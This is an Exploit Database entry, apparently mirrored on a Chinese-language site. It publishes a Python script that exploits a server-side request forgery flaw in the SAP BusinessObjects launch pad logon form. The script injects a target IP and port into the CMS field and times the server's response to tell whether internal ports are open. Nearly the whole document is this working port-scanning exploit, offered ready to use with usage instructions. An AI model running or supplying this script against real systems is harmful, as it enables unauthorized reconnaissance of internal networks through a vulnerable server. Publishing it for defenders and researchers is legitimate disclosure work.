SAP BusinessObjects launch pad – Server-Side Request Forgery

• Exploit Database
• 14 阅读

• 作者： Ahmad Mahfouz
  日期： 2017-12-27
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/43404/

• # Exploit Title: SAP BusinessObjects launch pad SSRF
  # Date: 2017-11-8
  # Exploit Author: Ahmad Mahfouz
  # Category: Webapps
  # Author Homepage: www.unixawy.com
  # Description: Design Error in SAP BusinessObjects launch pad leads to SSRF attack 
  
   
  #!/usr/bin/env python
  # SAP BusinessObjects launch pad SSRF Timing Attack Port scan
  # usage : sblpta.py http://path.faces targetIP targetPort
  import urllib2
  import urllib
  import ssl
  from datetime import datetime
  import sys
  
   
  
  if len(sys.argv) != 4:
  
   print "Usage: python sblpta.py http://path.faces targetIP targetPort"
   sys.exit(1)
  
  url = sys.argv[1]
  targetIP = sys.argv[2]
  targetPort = sys.argv[3]
  targetHostIP = "%s:%s" %(targetIP,targetPort)
  print "\r\n" 
  print "[*] SAP BusinessObjects Timing Attack"
  headers = {'User-Agent': 'Mozilla/5.0'}
  gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
  
  try:
  
   request = urllib2.Request(url, headers=headers)
   page = urllib2.urlopen(request, context=gcontext)
   print "[*] Connected to SAP Bussiness Object %s"%url
  
  except:
  
   print "[-] Failed To connect to SAP Bussiness Object %s" %url
   print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
   sys.exit(2)
  
   
  resheaders = page.info()
  cookie = resheaders.dict['set-cookie']
  content = page.readlines()
  
  for line in content:
  
   if "com.sun.faces.VIEW" in line:
  sfview = line.split("=")[4].split("\"")[1]
  print "[*] Got java faces dynamic value"
  
   else:
  continue
  
  if not sfview:
  
   print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
   sys.exit(3)
  
  
  formdata = {"_id0:logon:CMS":targetHostIP,
   "_id0:logon:USERNAME":"",
   "_id0:logon:PASSWORD":"",
   "com.sun.faces.VIEW":sfview,
   "_id0":"_id0"
   }
  
   
  
  data_encode = urllib.urlencode(formdata)
  start =datetime.now()
  print "[*] Testing Timing Attack %s" %start
  request = urllib2.Request(url,data_encode)
  request.add_header('Cookie', cookie)
  response= urllib2.urlopen(request)
  end = datetime.now()
  the_page = response.read()
  
  
  if "FWM" in the_page:
   
   elapsedTime = end-start
   if elapsedTime.total_seconds() >= 10:
  
  print "[*] Port %s is Open, Gotcha !!! " %targetPort
  
   else:
  
  print "[*] Port %s is Closed , we die fast"%targetPort
  
  elif "FWC" in the_page:
  
   print "[-] error login expired"
   sys.exit(10)